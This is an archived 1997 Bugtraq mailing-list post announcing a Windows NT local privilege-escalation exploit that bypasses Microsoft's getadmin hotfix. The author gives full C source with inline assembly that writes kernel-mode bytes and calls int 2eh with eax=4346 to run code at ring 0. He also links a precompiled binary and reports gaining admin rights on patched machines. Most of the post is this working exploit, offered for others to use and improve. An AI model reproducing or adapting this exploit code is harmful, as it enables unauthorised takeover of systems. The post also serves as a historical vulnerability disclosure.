Bugtraq mailing list archives
It's not over yet.
From: aleph1 () DFW NET (Aleph One)
Date: Fri, 11 Jul 1997 03:45:18 -0500
From: Costin RAIU <craiu () gecad ro> Subject: [NTSEC] It's not over yet. Hi everyone, We all know Microsoft released the getadmin hotfix. However after a few hours of work, I was able to create a new exploit which also works with this patch Microsoft just realeased. The problem is now in eax=4346 which is handled somewhere in win32k.sys. There are more (I found 4) vulnerable functions, but not so interesting like this one. By calling the function in a special way, you can get your own code get executed at ring 0 privilege. My program will simply change the byte of NtGlobalFlag to the DEBUG value, so you can run GetAdmin (which after the fix is not working anymore). Since compiling the source is very difficult, the compiled binary is avaible at http://www.gecad.ro/~craiu/cr4.exe This program was tested on 2 Windows NT patched machines, and worked ok. (I got the Admin rights) Here's the source of my program: /* Run user code at ring 0 Author: Costin RAIU <craiu () gecad ro> */ void* a[2]; void main(void) { int i; for (i=0;i<2;i++) a[i]=(void*)0; *(char*)(0x4080a4)=0x80; //or bptr [NtGlobalFlag+2],c1h *(char*)(0x4080a5)=0x0d; *(char*)(0x4080a6)=0xb6; *(char*)(0x4080a7)=0xc2; *(char*)(0x4080a8)=0x14; *(char*)(0x4080a9)=0x80; *(char*)(0x4080aa)=0xc1; *(char*)(0x4080ab)=0xcf; _asm { mov eax,4346 mov edx,offset a int 2eh } } Due to the nature of this bug, is very important the address of the mov eax,4346 instruction must be 004080a4. I am not an expert in the PE structure, but my cr4.exe program will always run at that address on my test machine. An assembler version might be very interesting, but there are other things to do now. (like checking eax=187) If any of you guys has better assembler skills, I would like to see a nice asm version of my program. OBJE: 4080a4 is somewhere in the program space, but it is not used (debug info/data space etc...) You can probably conroll the address of the retf (which btw. it is located at a0020b87h) After doing the "or" instruction, and IRETD is required to continue the execution of the function, otherwise the kernel will crash. bye, c0s Costin RAIU, Data Security Expert E-MAIL: BUSINESS mailto:craiu () gecad ro, PERSONAL craiu () usa net PGP Key : http://www.gecad.ro/~craiu/craiu.asc (or search www.pgp.com) KeyID: 2048/DD35A295 Costin RAIU <craiu () gecad ro> Key fingerprint = FD 14 2A 90 64 41 58 9A 6B 34 47 D8 C5 E2 F4 5C
Current thread:
- Vulnerability in Glimpse HTTP Razvan Dragomirescu (Jul 02)
- Re: Vulnerability in Glimpse HTTP Brian Gentry (Jul 02)
- Re: Vulnerability in Glimpse HTTP Jean-Christophe Touvet (Jul 03)
- Re: Vulnerability in Glimpse HTTP Paul Phillips (Jul 08)
- Re: Vulnerability in Glimpse HTTP Oliver Friedrichs (Jul 09)
- CERT Vendor-Initiated Bulletin VB-97.05 - Vul in Lynx Temporary Nicolas Dubee (Jan 01)
- Re: Vulnerability in Glimpse HTTP Martin Pool (Jul 10)
- It's not over yet. Aleph One (Jul 11)
- It's not over yet. Manley, Jim W (Jul 11)
- More information about JavaScript bug Dominick Matthias PN OIL 6 (Jul 11)
- new post SP3 hotfix: lm-fix Alex Libenson (Jul 12)
- Minor PGP vulnerability Harald Weidner (Jul 15)
- GetAdmin - Hotfix silent release ? Olivier Gerschel (Jul 16)
- Re: Minor PGP vulnerability Lucky Green (Jul 16)
- CERT Advisory CA-97.21 - SGI Buffer Overflow Vulnerabilities Aleph One (Jul 17)
- slight misinformation in CA-97.21 Dave Kormann (Jul 17)
- msg00234.html brush () SEARCH POL PL (Jul 17)
- CERT Vendor-Initiated Bulletin VB-97.05 - Vul in Lynx Temporary Aleph One (Jul 16)
- Re: Vulnerability in Glimpse HTTP Brian Gentry (Jul 02)